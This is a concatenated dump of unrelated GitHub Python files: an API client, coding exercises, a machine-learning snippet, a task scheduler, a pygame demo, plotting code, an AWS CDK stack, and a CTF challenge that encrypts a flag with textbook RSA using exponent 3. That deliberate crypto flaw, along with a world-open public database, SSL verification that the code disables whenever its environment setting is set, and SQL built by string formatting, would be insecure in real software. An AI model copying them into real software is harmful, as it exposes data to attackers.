CommonResponse\nfrom config import maintenance_settings, depreg_config\n\n\nclass DepregAPI:\n \"\"\"\n Интеграция с API Департамента Регистрации Мероприятий\n docs: https://app.swaggerhub.com/apis/cimmwolf/et.depreg.ru/2.1.0#/\n \"\"\"\n _headers: dict[str, str] = {'accept': 'application/json'}\n\n def __init__(self, config: dict[str, Any] = None):\n self._request_class: type[CommonRequest] = CommonRequest\n self._session: ClientSession = self._get_session()\n\n if not config:\n config = depreg_config\n self._base_url: str = config[\"base_url\"]\n self._auth_type: str = config[\"auth_type\"]\n\n async def get_participants(\n self,\n event_id: int,\n token: str,\n fields: str | None = None,\n page: int = 1,\n ) -> DepregParticipantsDTO:\n \"\"\"\n Позволяет получить постраничный доступ к списку участников мероприятия.\n\n Parameters API:\n filter[eventId]* (integer): ID события; required: true;\n fields (string): Список полей, разделённых запятыми, которые будут возвращены.;\n page (integer): Страница списка; minimum: 1\n\n Response example:\n [\n {\n \"id\": 0,\n \"eventId\": 0,\n \"groupId\": 0,\n \"code\": \"string\",\n \"name\": \"Пантелеймон\",\n \"surname\": \"string\",\n \"patronymic\": \"string\",\n \"email\": \"user@example.com\",\n \"phone\": \"string\",\n \"company\": \"string\",\n \"info\": {},\n \"marked\": true\n }\n ]\n \"\"\"\n query_params: dict[str, Any] = {\n \"filter[eventId]\": event_id,\n \"page\": page,\n }\n if fields:\n query_params[\"fields\"] = fields\n\n request_data: dict[str, Any] = dict(\n url=self._base_url + \"/participants\",\n method=\"GET\",\n query=query_params,\n session=self._session,\n headers=self._headers,\n auth_type=self._auth_type,\n token=token,\n )\n response: CommonResponse = await self._make_request(request_data)\n response_data: list[dict[str, Any]] = []\n response_data.extend(response.data)\n\n page_count: int = int(response.raw.headers['X-Pagination-Page-Count'])\n current_page: int = int(response.raw.headers['X-Pagination-Current-Page'])\n\n await self._process_pagination(\n page_count=page_count,\n current_page=current_page,\n response_data=response_data,\n event_id=event_id,\n token=token,\n )\n\n return DepregParticipantsDTO(**{\"data\": response_data})\n\n async def _process_pagination(\n 
self,\n page_count: int,\n current_page: int,\n response_data: list[dict[str, Any]],\n event_id: int,\n token: str,\n ) -> None:\n async_tasks: list[Coroutine | None] = []\n for page in range(current_page + 1, page_count + 1):\n query_params: dict[str, Any] = {\n \"filter[eventId]\": event_id,\n \"page\": page,\n }\n request_data: dict[str, Any] = dict(\n url=self._base_url + \"/participants\",\n method=\"GET\",\n query=query_params,\n session=self._session,\n headers=self._headers,\n auth_type=self._auth_type,\n token=token,\n )\n async_tasks.append(self._make_request(request_data))\n\n [response_data.extend(result.data) for result in await asyncio.gather(*async_tasks)]\n\n async def get_group_by_id(self, group_id: int, token: str) -> DepregGroupDTO:\n \"\"\"\n Возвращает информацию о конкретной группе, чей ID указан в URL\n\n Parameters API:\n group_id* (integer): ID группы; required: true;\n\n Response example:\n {\n \"id\": 4584,\n \"eventId\": 1471,\n \"templateId\": null,\n \"createdAt\": \"2023-10-10 13:45:24\",\n \"name\": \"14:00-15:00\"\n }\n \"\"\"\n request_data: dict[str, Any] = dict(\n url=self._base_url + f\"/groups/{group_id}\",\n method=\"GET\",\n session=self._session,\n headers=self._headers,\n auth_type=self._auth_type,\n token=token,\n )\n response: CommonResponse = await self._make_request(request_data)\n return DepregGroupDTO(**response.data)\n\n async def _make_request(self, request_data: dict[str, Any]) -> CommonResponse:\n request_get: Callable[..., Coroutine] = self._request_class(**request_data)\n response = await request_get()\n if response.status == HTTPStatus.OK:\n return response\n raise DepregAPIError\n\n def _get_session(self) -> ClientSession:\n if maintenance_settings.get(\"environment\", \"dev\"):\n return ClientSession(connector=TCPConnector(verify_ssl=False))\n return ClientSession()\n\n async def __aenter__(self) -> \"DepregAPI\":\n \"\"\"\n Nothing on entering context manager\n \"\"\"\n return self\n\n async def __aexit__(self, exc_type, exc_val, exc_tb) -> None:\n if not self._session.closed:\n await self._session.close()\n","repo_name":"r2r2/strana_backend","sub_path":"cabinet/common/depreg/depreg_api.py","file_name":"depreg_api.py","file_ext":"py","file_size_in_byte":5928,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"32976848395","text":"class Solution(object):\n def longestCommonSubsequence(self, text1, text2):\n \"\"\"\n :type text1: str\n :type text2: str\n :rtype: int\n \"\"\"\n rows = len(text1)\n cols = len(text2)\n matching = [[0 for j in range(rows+1) ]for i in range(cols+1)]\n # print(matching)\n for i in range(1, cols+1):\n for j in range(1, rows+1):\n # print(text2[i-1], text1[j-1],i,j)\n if text2[i-1] == text1[j-1]:\n matching[i][j] = 1+ matching[i-1][j-1]\n else:\n matching[i][j] = max( matching[i][j - 1] , matching[i-1][j])\n\n return (matching[cols][rows])\n\n\n\n\nsol = Solution()\ntext1 = \"\"\ntext2 = \"\"\nprint(sol.longestCommonSubsequence(text1,text2))","repo_name":"nithinveer/leetcode-solutions","sub_path":"Longest Common Subsequence.py","file_name":"Longest Common Subsequence.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"19331801973","text":"#!/usr/bin/env python3\n# -----------------------------------------------------------\n# test_circle_class.py\n# uses unittest module to test Circle class module\n# 
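# --- Illustrative aside, not part of the test module below: exercising the
# longestCommonSubsequence DP defined just above. The expected values follow
# directly from the recurrence (match -> 1 + diagonal, else max of neighbors).
sol = Solution()
assert sol.longestCommonSubsequence("abcde", "ace") == 3   # LCS is "ace"
assert sol.longestCommonSubsequence("abc", "def") == 0     # nothing shared
assert sol.longestCommonSubsequence("", "") == 0           # empty inputs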
-----------------------------------------------------------\n\n\nimport unittest\nfrom io import StringIO\nfrom contextlib import redirect_stdout\nfrom circle_class import Circle\n\nclass CircleClassTest(unittest.TestCase):\n\n def test_circle_init(self):\n c = Circle()\n self.assertEqual(c.radius, 1)\n c = Circle(4)\n self.assertEqual(c.radius, 4)\n with self.assertRaises(TypeError):\n c = Circle(-100)\n self.assertEqual(Circle(4), c)\n\n def test_diameter(self):\n c = Circle()\n self.assertEqual(c.diameter, 2)\n c = Circle(4)\n self.assertEqual(c.diameter, 8)\n\n def test_set_diameter(self):\n c = Circle(4)\n c.diameter = 2\n self.assertEqual(c.diameter, 2)\n self.assertEqual(c.radius, 1)\n with self.assertRaises(ValueError):\n c.diameter = -100\n\n def test_get_area(self):\n c = Circle(2)\n self.assertAlmostEqual(c.area, 12.5663706, places=7)\n with self.assertRaises(AttributeError):\n c.area = 13\n\n def test_from_diameter(self):\n c = Circle.from_diameter(8)\n self.assertEqual(c.diameter, 8)\n self.assertEqual(c.radius, 4)\n self.assertEqual(Circle(1.0), Circle.from_diameter())\n with self.assertRaises(ValueError):\n Circle.from_diameter(-100)\n\n def test_str_method(self):\n c = Circle()\n f = StringIO()\n with redirect_stdout(f):\n print(c)\n self.assertIn(\"Circle with radius: 1.\", f.getvalue())\n\n def test_repr_method(self):\n c = Circle()\n self.assertEqual(\"Circle(1.0)\", repr(c))\n d = eval(repr(c))\n self.assertEqual(c.radius, d.radius)\n\n\n def test_two_circle_add(self):\n c = Circle(2)\n d = Circle(4)\n self.assertEqual(6, (c + d).radius)\n self.assertEqual(12, (c + d).diameter)\n with self.assertRaises(TypeError):\n d = c + 'Square'\n\n def test_circle_mul(self):\n c = Circle(3)\n self.assertEqual(9, (c * 3).radius) # Test __mul__\n with self.assertRaises(TypeError):\n d = c * 'monkey'\n self.assertEqual(9, (3 * c).radius) # Test __rmul__\n self.assertAlmostEqual(9.00, (3.0 * c).radius, places=2)\n\n def test_lt_oper(self):\n c = Circle(0)\n d = Circle(2)\n self.assertEqual(True, c < d)\n self.assertEqual(True, d > c)\n self.assertEqual(False, c == d)\n c = eval(repr(d))\n self.assertEqual(False, c < d)\n self.assertEqual(False, d > c)\n self.assertEqual(True, c == d)\n\n with self.assertRaises(TypeError):\n print(c == 'monkey')\n with self.assertRaises(TypeError):\n print(c < 'monkey')\n\n\n def test_sort_circles(self):\n cl = [Circle(6), Circle(7), Circle(8), Circle(4), Circle(0),\n Circle(2), Circle(3), Circle(5), Circle(9), Circle(1)]\n cl.sort()\n self.assertEqual(cl,\n [Circle(0), Circle(1), Circle(2), Circle(3), Circle(4),\n Circle(5), Circle(6), Circle(7), Circle(8), Circle(9)]\n )\n\n def test_reflected_numerics(self):\n a = Circle(4)\n self.assertTrue(a * 3 == 3 * a)\n\n def test_augmented_assignment(self):\n a = Circle(4)\n b = Circle(2)\n a += b\n self.assertEqual(Circle(6), a)\n\n a *= 2\n self.assertEqual(Circle(12), a)\n\n a /= 2\n self.assertEqual(Circle(6), a)\n\n def test_sub_circles(self):\n a = Circle(4)\n b = Circle(2)\n self.assertEqual(Circle(2), a - b)\n self.assertEqual(Circle(0), b - a)\n\n def test_div_circles(self):\n a = Circle(10)\n self.assertEqual(Circle(5), a / 2)\n with self.assertRaises(ZeroDivisionError):\n print(a / 0)\n with self.assertRaises(ValueError):\n print(a / -2)\n\n def test_floor_div_circles(self):\n a = Circle(9)\n self.assertEqual(Circle(4), a // 2)\n with self.assertRaises(ZeroDivisionError):\n print(a // 0)\n with self.assertRaises(ValueError):\n print(a // 
-2)\n","repo_name":"UWPCE-PythonCert-ClassRepos/Wi2018-Online","sub_path":"students/ChrisH/lesson08/test_circle_class.py","file_name":"test_circle_class.py","file_ext":"py","file_size_in_byte":4339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"31029597844","text":"import random\n\nstart = 5\n\ndef even_odd(num):\n if num % 2 == 0:\n print(\"{} is even\".format(num))\n else:\n print(\"{} is odd\".format(num))\n\nwhile start > 0 :\n valor = int(random.randint(1, 99))\n even_odd(valor)\n start -= 1\n","repo_name":"tiware23/treehouseNe","sub_path":"even.py","file_name":"even.py","file_ext":"py","file_size_in_byte":248,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"3817428627","text":"import numpy as np\nimport pandas as pd\n\n\nclass Winnow:\n\n def __init__(self, amount_features):\n self.n = amount_features\n self.weights = np.ones(amount_features)\n\n def __call__(self, data, labels):\n num_mistakes = 0\n while True:\n print(f\"current weights: {self.weights}\")\n num_mistake = 0\n for i in range(len(data)):\n row = data[i]\n print(f\"{i}th row: {row} ,label: {labels[i]}\")\n row_sum = np.sum(np.array([self.weights[j] * row[j] for j in range(self.n)]))\n print(f\"sum: {row_sum}, threshold: {self.n}\")\n if row_sum > self.n:\n if labels[i] == 0:\n num_mistake += 1\n for k in range(self.n):\n if row[k] == 1:\n self.weights[k] = 0\n num_mistakes += 1\n break\n else:\n if labels[i] == 1:\n num_mistake += 1\n for k in range(self.n):\n if row[k] == 1:\n self.weights[k] = 2 * self.weights[k]\n num_mistakes += 1\n break\n if num_mistake == 0:\n print(f\"the algo made: {num_mistakes} mistakes\")\n print(f\"final weights: {self.weights}\")\n break\n","repo_name":"LiorBreitman8234/ML_Ex","sub_path":"Ex3/Winnow.py","file_name":"Winnow.py","file_ext":"py","file_size_in_byte":1477,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"21072998623","text":"\"\"\"\nKeeps data up to date\n\"\"\"\n\nimport logging\nimport requests\nfrom multiprocessing import Process, Queue\nimport time\nimport sqlalchemy as s\nimport pandas as pd\nimport os\nimport json\nlogging.basicConfig(filename='housekeeper.log')\n\nclass Housekeeper:\n\n def __init__(self, jobs, broker, broker_host, broker_port, user, password, host, port, dbname):\n\n self.broker_host = broker_host\n self.broker_port = broker_port\n self.broker = broker\n DB_STR = 'postgresql://{}:{}@{}:{}/{}'.format(\n user, password, host, port, dbname\n )\n\n dbschema='augur_data'\n self.db = s.create_engine(DB_STR, poolclass=s.pool.NullPool,\n connect_args={'options': '-csearch_path={}'.format(dbschema)})\n\n helper_schema = 'augur_operations'\n self.helper_db = s.create_engine(DB_STR, poolclass = s.pool.NullPool,\n connect_args={'options': '-csearch_path={}'.format(helper_schema)})\n\n repoUrlSQL = s.sql.text(\"\"\"\n SELECT repo_git FROM repo\n \"\"\")\n\n rs = pd.read_sql(repoUrlSQL, self.db, params={})\n\n all_repos = rs['repo_git'].values.tolist()\n\n # List of tasks that need periodic updates\n self.__updatable = self.prep_jobs(jobs)\n\n self.__processes = []\n self.__updater()\n\n @staticmethod\n def updater_process(broker_host, broker_port, broker, model, given, delay, repos, repo_group_id=None):\n \"\"\"\n Controls a given plugin's update process\n :param name: name of object to be updated \n :param delay: time needed to update\n :param shared: shared object that is to also be 
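# --- Illustrative aside, not part of the Housekeeper module below: driving
# the Winnow learner defined above on a toy dataset. The data, labels and
# target concept (x0 OR x1) are made up for illustration; Winnow's threshold
# is n, weights double on false negatives and zero out on false positives.
import numpy as np

data = np.array([[1, 0, 0], [0, 1, 0], [0, 0, 1], [0, 0, 0]])
labels = np.array([1, 1, 0, 0])     # target concept: x0 OR x1
learner = Winnow(3)
learner(data, labels)               # loops until a mistake-free pass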
updated\n \"\"\"\n if repo_group_id:\n logging.info('Housekeeper spawned {} model updater process for subsection {} with PID {}'.format(model, repo_group_id, os.getpid()))\n else:\n logging.info('Housekeeper spawned {} model updater process for repo {} with PID {}'.format(model, repos[0]['repo_id'], os.getpid()))\n\n try:\n compatible_worker_found = False\n # Waiting for compatible worker\n while True:\n for worker in list(broker._getvalue().keys()):\n # logging.info(\"{} {} {} {} {}\".format(worker, model, broker[worker]['models'], given, broker[worker]['given']))\n if model in broker[worker]['models'] and given in broker[worker]['given']:\n compatible_worker_found = True\n if compatible_worker_found:\n logging.info(\"Housekeeper recognized that the broker has a worker that \" + \n \"can handle the {} model... beginning to distribute maintained tasks\".format(model))\n time.sleep(4)\n while True:\n logging.info('Housekeeper updating {} model with given {}...'.format(\n model, given[0]))\n \n if given[0] == 'git_url' or given[0] == 'github_url':\n for repo in repos:\n if given[0] == 'github_url' and 'github.com' not in repo['repo_git']:\n continue\n given_key = 'git_url' if given[0] == 'git_url' else 'github_url'\n task = {\n \"job_type\": \"MAINTAIN\", \n \"models\": [model], \n \"display_name\": \"{} model for url: {}\".format(model, repo['repo_git']),\n \"given\": {}\n }\n task['given'][given_key] = repo['repo_git']\n if \"focused_task\" in repo:\n task[\"focused_task\"] = repo['focused_task']\n try:\n requests.post('http://{}:{}/api/unstable/task'.format(\n broker_host,broker_port), json=task, timeout=10)\n except Exception as e:\n logging.info(\"Error encountered: {}\".format(e))\n\n time.sleep(0.5)\n elif given[0] == 'repo_group':\n task = {\n \"job_type\": \"MAINTAIN\", \n \"models\": [model], \n \"display_name\": \"{} model for repo group id: {}\".format(model, repo_group_id),\n \"given\": {\n \"repo_group\": repos\n }\n }\n try:\n requests.post('http://{}:{}/api/unstable/task'.format(\n broker_host,broker_port), json=task, timeout=10)\n except Exception as e:\n logging.info(\"Error encountered: {}\".format(e))\n\n logging.info(\"Housekeeper finished sending {} tasks to the broker for it to distribute to your worker(s)\".format(len(repos)))\n time.sleep(delay)\n break\n time.sleep(3)\n \n except KeyboardInterrupt:\n os.kill(os.getpid(), 9)\n os._exit(0)\n except:\n raise\n\n def __updater(self, updates=None):\n \"\"\"\n Starts update processes\n \"\"\"\n logging.info(\"Starting update processes...\")\n if updates is None:\n updates = self.__updatable\n for update in updates:\n up = Process(target=self.updater_process, args=(self.broker_host,self.broker_port, self.broker, update['model'], \n update['given'], update['delay'], update['repos'], update['repo_group_id']), daemon=True)\n up.start()\n self.__processes.append(up)\n\n def update_all(self):\n \"\"\"\n Updates all plugins\n \"\"\"\n for updatable in self.__updatable:\n updatable['update']()\n\n def schedule_updates(self):\n \"\"\"\n Schedules updates\n \"\"\"\n # don't use this, \n logging.debug('Scheduling updates...')\n self.__updater()\n\n def join_updates(self):\n \"\"\"\n Join to the update processes\n \"\"\"\n for process in self.__processes:\n process.join()\n\n def shutdown_updates(self):\n \"\"\"\n Ends all running update processes\n \"\"\"\n for process in self.__processes:\n process.terminate()\n\n def prep_jobs(self, jobs):\n\n for job in jobs:\n if 'repo_group_id' in job:\n if job['repo_group_id'] != 0:\n # Query 
all repos and last repo id\n repoUrlSQL = s.sql.text(\"\"\"\n SELECT repo_git, repo_id FROM repo WHERE repo_group_id = {} ORDER BY repo_id ASC\n \"\"\".format(job['repo_group_id']))\n else:\n repoUrlSQL = s.sql.text(\"\"\"\n SELECT repo_git, repo_id FROM repo ORDER BY repo_id ASC\n \"\"\".format(job['repo_group_id']))\n rs = pd.read_sql(repoUrlSQL, self.db, params={})\n if len(rs) == 0:\n logging.info(\"Trying to send tasks for repo group with id: {}, but the repo group does not contain any repos\".format(job['repo_group_id']))\n continue\n\n if 'starting_repo_id' in job:\n last_id = job['starting_repo_id']\n else:\n repoIdSQL = s.sql.text(\"\"\"\n SELECT since_id_str FROM worker_job\n WHERE job_model = '{}'\n \"\"\".format(job['model']))\n\n job_df = pd.read_sql(repoIdSQL, self.helper_db, params={})\n\n # If a last id is not recorded, start from beginning of repos \n # (first id is not necessarily 0)\n try:\n last_id = int(job_df.iloc[0]['since_id_str'])\n except:\n last_id = 0\n\n jobHistorySQL = s.sql.text(\"\"\"\n SELECT max(history_id) AS history_id, status FROM worker_history\n GROUP BY status\n LIMIT 1\n \"\"\")\n\n history_df = pd.read_sql(jobHistorySQL, self.helper_db, params={})\n\n finishing_task = False\n if len(history_df.index) != 0:\n if history_df.iloc[0]['status'] == 'Stopped':\n self.history_id = int(history_df.iloc[0]['history_id'])\n finishing_task = True\n # last_id += 1 #update to match history tuple val rather than just increment\n\n\n # Rearrange repos so the one after the last one that \n # was completed will be ran first\n before_repos = rs.loc[rs['repo_id'].astype(int) < last_id]\n after_repos = rs.loc[rs['repo_id'].astype(int) >= last_id]\n\n reorganized_repos = after_repos.append(before_repos)\n\n if 'all_focused' in job:\n reorganized_repos['focused_task'] = job['all_focused']\n\n reorganized_repos = reorganized_repos.to_dict('records')\n \n if finishing_task:\n reorganized_repos[0]['focused_task'] = 1\n \n job['repos'] = reorganized_repos\n\n elif 'repo_id' in job:\n job['repo_group_id'] = None\n repoUrlSQL = s.sql.text(\"\"\"\n SELECT repo_git, repo_id FROM repo WHERE repo_id = {}\n \"\"\".format(job['repo_id']))\n\n rs = pd.read_sql(repoUrlSQL, self.db, params={})\n\n if 'all_focused' in job:\n rs['focused_task'] = job['all_focused']\n\n rs = rs.to_dict('records')\n\n job['repos'] = rs\n\n return jobs\n\n","repo_name":"computationalmystic/sengfs19-group8","sub_path":"augur/housekeeper/housekeeper.py","file_name":"housekeeper.py","file_ext":"py","file_size_in_byte":10267,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"5"} +{"seq_id":"32019625256","text":"import pygame\n\n# initialize pygame\npygame.init()\n\n# display pygame window width and height; tuple\nwin = pygame.display.set_mode((500, 500))\n\n# display caption\npygame.display.set_caption(\"First Game\")\n\n# 3. add screen width\nscreenWidth = 500\n\nx = 50\ny = 50\nwidth = 40\nheight = 50\nvel = 20\n\n# 5. jumping\nisJump = False\njumpCount = 10\n\nrun = True\n# main loop check for collision\nwhile run:\n pygame.time.delay(100) # delay in milliseconds\n\n for event in pygame.event.get():\n # 1. check if click exit button\n if event.type == pygame.QUIT:\n run = False\n\n # 3. key pressed \n keys = pygame.key.get_pressed()\n if keys[pygame.K_LEFT] and x > vel: # add 2nd condition to not go off screen\n x -= vel\n if keys[pygame.K_RIGHT] and x < screenWidth - width: # screen width - the character width\n x += vel\n # 5. 
jumping\n if not(isJump):\n if keys[pygame.K_UP] and y > vel:\n y -= vel\n if keys[pygame.K_DOWN] and y < screenWidth - vel:\n y += vel\n if keys[pygame.K_SPACE]: # 5. jumping\n isJump = True\n else: # 5. jumping\n if jumpCount >= -10:\n neg = 1\n if jumpCount < 0:\n neg = -1\n y -= (jumpCount ** 2) * 0.5 * neg\n jumpCount -= 1\n else:\n isJump = False\n jumpCount = 10\n\n # 4. draw over the rectangles once move\n win.fill((0,0,0))\n\n # 2. draw shape; parameter ==> ((surface, color, rect)\n pygame.draw.rect(win, (233, 255, 0), (x, y, width, height))\n pygame.display.update()\n\n\npygame.quit()","repo_name":"wonntann/Pygame","sub_path":"pygameMovement/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1630,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"72336363992","text":"from Crypto.Util.number import getPrime, bytes_to_long\n\nwith open(\"flag.txt\",'r') as f:\n\tflag = f.read()\n\ndef main():\n\tN = getPrime(512)*getPrime(512)\n\tc = pow(bytes_to_long(bytes(flag,'utf-8')),3,N)\n\tprint('N =',N)\n\tprint('e = 3')\n\tprint('c =',c)\n\nif __name__ == \"__main__\":\n\tmain()","repo_name":"USC-CTF-Team/public-USC-CTF-Fall-23","sub_path":"crypto/RSA-1/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":283,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"23629448096","text":"from math import pi\nimport numpy as np\n\nfrom bokeh.plotting import figure\nfrom bokeh.models import ColumnDataSource, FactorRange\nfrom bokeh.palettes import Category20, Spectral5\nfrom bokeh.transform import cumsum, factor_cmap\n\n#local imports\nfrom .transform_to_list import Transform\n\n\ndef select_and_plot(session, name_button, plot_function, upload_folder):\n \"\"\"Function to manage the data and plot selection\n\n session: session of Flask\n name_button: Name of the button that pass the form value (String)\n plot_function: Plot function (function)\n upload_folder: Name of the folder where the file is (string)\"\"\"\n\n #Define the data to be graph\n filename = session.get('file_data_name')\n #Columns added to be plot\n data_graph = session.get(name_button)\n #Organize the data and make the plot\n if (data_graph is not None) and (len(data_graph) > 0):\n #Get the table \n table = Transform(filename, upload_folder)\n #Select the specified data\n table_selected_data = table.select_data(data_graph)\n #Plot\n p = plot_function(data_graph, table_selected_data)\n\n return p\n else:\n return None\n\n\n\ndef transform_to_num(col_names, data):\n \"\"\"Transform the strings value into floats, the categorical values will be left apart, the \n return will be a dictionary.\n\n col_names: list of the column names\n data: list of lists of the values for each column\"\"\"\n\n int_data = {}\n\n for name, row in zip(col_names, data):\n \n try:\n for i in range(len(row)):\n row[i] = float(row[i])\n\n int_data[name] = row\n except ValueError:\n continue \n \n return int_data\n\n \n\ndef pie_graph( col_names, data):\n \"\"\"Function to make the pie plot, take the columns transform into float values and sum all the values to make\n the plot (it can't do a pie plot per row).\n \n col_names: list of the column names\n data: list of lists of the values for each column\"\"\"\n \n #Summarize the columns\n pie_data = transform_to_num(col_names, data)\n for name, row in pie_data.items():\n pie_data[name] = sum(row)\n\n \n #Define the final data for the graph (format)\n data_bokeh = 
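# --- Illustrative aside, not part of the plotting module below: the RSA
# challenge above uses e = 3, so if the flag is short enough that m**3 < N,
# c is m**3 over the integers and m is recovered as an exact cube root.
# A hedged sketch of that recovery; `icbrt` is a hypothetical helper.
def icbrt(n):
    # Integer cube root by binary search: smallest m with m**3 >= n.
    lo, hi = 0, 1 << (n.bit_length() // 3 + 2)
    while lo < hi:
        mid = (lo + hi) // 2
        if mid ** 3 < n:
            lo = mid + 1
        else:
            hi = mid
    return lo

# m = icbrt(c)  # if m**3 == c, then m.to_bytes((m.bit_length() + 7) // 8,
#               # "big") yields the plaintext bytes.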
{'legends': list(pie_data.keys()),\n 'values': list(pie_data.values()),\n 'color': Category20[20]}\n\n data_bokeh['angles'] = []\n for name, val in pie_data.items():\n angle = val/sum(list(pie_data.values())) * 2 * pi\n data_bokeh['angles'].append(angle)\n \n #Transform the dictionary into the format required by bokeh\n source = ColumnDataSource(data_bokeh)\n\n #Bokeh plot configuration\n p = figure(plot_height = 600, plot_width = 800, tools = 'hover', tooltips = \"@legends: @values\")\n p.wedge(x = 0, y = 1, radius =0.6, start_angle = cumsum('angles', include_zero = True), \n end_angle = cumsum('angles'), legend_field = 'legends', fill_color = 'color', \n line_color ='white', source = source)\n\n return p\n\n \n\ndef bar_graph(col_names, data):\n \"\"\"Function to make the bar plot, take the columns transform into float values. \n the FIRST COLUMN MUST BE CATEGORICAL, the other numerical and will be added to the plot\n \n col_names: list of the column names\n data: list of lists of the values for each column\"\"\"\n\n #Take the first column, MUST BE CATEGORICAL\n data_bokeh = {\n 'categorical': data[0],\n }\n\n #Organize the dictionary information\n bar_data = transform_to_num(col_names, data)\n data_bokeh.update(bar_data)\n data_bokeh['data_col']= list(bar_data.keys())\n \n #Define necessary columns for multiple bars\n x = [(categ, data) for categ in data_bokeh['categorical'] for data in data_bokeh['data_col']]\n ##Organize all the numerical data in a single list\n counts = []\n for i in range(len(data[0])):\n for name in bar_data.keys():\n counts.append(bar_data[name][i])\n \n #Transform the dictionary into the format required by bokeh\n source = ColumnDataSource(data = dict(x = x, counts = counts))\n\n #Bokeh plot configuration\n p = figure(plot_height = 600, plot_width = 800, x_range = FactorRange(*x))\n p.vbar(x = 'x', top = 'counts', width = 0.9, line_color = 'white', source = source,\n fill_color = factor_cmap('x', palette = Spectral5, factors = data_bokeh['data_col'], start = 1, end = 2) )\n p.x_range.range_padding = 0.1\n p.xaxis.major_label_orientation = 1.2\n \n return p\n \n \n\ndef histogram_plot(col_names, data):\n \"\"\"Function to make the histogram, only show one variable \n \n col_names: list of the column names\n data: list of lists of the values for each column\"\"\"\n\n #transform to numerical data\n hist_data = transform_to_num(col_names, data)\n\n #Calculate and define the histogram data\n hist, edges = np.histogram(list(hist_data.values())[0], density = True, bins = 30)\n\n #Bokeh plot configuration\n p = figure(plot_height = 600, plot_width = 800)\n p.quad(top = hist, bottom = 0, left = edges[:-1], right = edges[1:], line_color = 'white')\n\n return p \n\n\ndef line_plot(col_names, data):\n \"\"\"Function to make the line plot, the FIRST COLUMN will be the x axis and the others will be added\n \n col_names: list of the column names\n data: list of lists of the values for each column\"\"\"\n\n #Transform to numerical data\n line_data = transform_to_num(col_names, data)\n \n #Transform the dictionary into the format required by bokeh\n source = ColumnDataSource(line_data)\n\n #Bokeh plot configuration\n p = figure(plot_height = 600, plot_width = 800)\n for key, color in zip(range(len(line_data.keys())), Category20[20]):\n if key != 0:\n p.line(x = list(line_data.values())[0], y = list(line_data.values())[key], color = color, \n legend_label = list(line_data.keys())[key])\n\n return p \n \n\ndef scatter_plot(col_names, data):\n \"\"\"Function to make the scatter 
plot, the FIRST COLUMN will be the x axis and the others will be added\n \n col_names: list of the column names\n data: list of lists of the values for each column\"\"\"\n\n #Transform to numerical data\n scatter_data = transform_to_num(col_names, data)\n\n #Transform the dictionary into the format required by bokeh\n source = ColumnDataSource(scatter_data)\n\n #Bokeh plot configuration\n p = figure(plot_height = 600, plot_width = 800)\n for key, color in zip(range(len(scatter_data.keys())), Category20[20]):\n if key != 0:\n p.scatter(x = list(scatter_data.values())[0], y = list(scatter_data.values())[key], color = color, \n fill_alpha = 0.6, legend_label = list(scatter_data.keys())[key])\n\n return p \n\n\n\n\n\n\n","repo_name":"AndresRubianoM/Web-DataVisualization","sub_path":"app/plots_functions.py","file_name":"plots_functions.py","file_ext":"py","file_size_in_byte":6765,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"36718770304","text":"from aws_cdk import Stack, aws_ec2 as ec2, aws_rds as rds\nfrom constructs import Construct\n\n\nclass TechChallengeRds(Stack):\n def __init__(\n self, scope: Construct, construct_id: str, vpc: ec2.Vpc, **kwargs\n ) -> None:\n super().__init__(scope, construct_id, **kwargs)\n\n # Create RDS Security Group\n rds_sg = ec2.SecurityGroup(\n self,\n f\"{construct_id}-RDS-SG\",\n security_group_name=f\"{construct_id}-RDS-SG\",\n vpc=vpc,\n )\n rds_sg.add_ingress_rule(peer=ec2.Peer.any_ipv4(), connection=ec2.Port.tcp(5432))\n\n # Deploy Postgres RDS Instance in Private Subnet with MultiAZ\n self.db = rds.DatabaseCluster(\n self,\n id=f\"{construct_id}-Postgres\",\n cluster_identifier=f\"{construct_id}-Postgres\",\n engine=rds.DatabaseClusterEngine.aurora_postgres(\n version=rds.AuroraPostgresEngineVersion.VER_13_3\n ),\n instance_props=rds.InstanceProps(\n vpc=vpc,\n vpc_subnets=ec2.SubnetSelection(subnet_type=ec2.SubnetType.PUBLIC),\n instance_type=ec2.InstanceType.of(\n ec2.InstanceClass.BURSTABLE3, ec2.InstanceSize.MEDIUM\n ),\n publicly_accessible=True,\n security_groups=[rds_sg],\n ),\n deletion_protection=False,\n )\n","repo_name":"dinindunz/tech_challenge_app","sub_path":"stacks/tech_challenge_rds.py","file_name":"tech_challenge_rds.py","file_ext":"py","file_size_in_byte":1413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"7621849896","text":"import subprocess\nimport argparse\nimport re\nimport sys\nimport shutil\nimport os\n\ndef get_options():\n parser = argparse.ArgumentParser(description=\"Run pipeline to analyse flanking regions of a focal gene.\")\n parser.add_argument(\"--contigs\", required=True,\n help=\"fasta with contigs containing central/focal gene\")\n parser.add_argument(\"--gene_fasta\", required=True,\n help=\"fasta with nucleotide sequence of focal gene\")\n parser.add_argument(\"--focal_gene_name\", required=True,\n help=\"name of focal gene\\n(NOTE: if using gffs, must match name of protein product e.g. IMP-4 not blaIMP-4)\")\n parser.add_argument(\"--flanking_region\", required=False,\n help=\"size of flanking region (N.B. currently symmetrical upstream/downstream). Default: 5000\",\n default=\"5000\")\n parser.add_argument(\"--output_dir\", required=False,\n help=\"output directory. Default: output\",\n default=\"output\")\n parser.add_argument(\"--force\", required=False,\n help=\"whether to overwrite existing input files. 
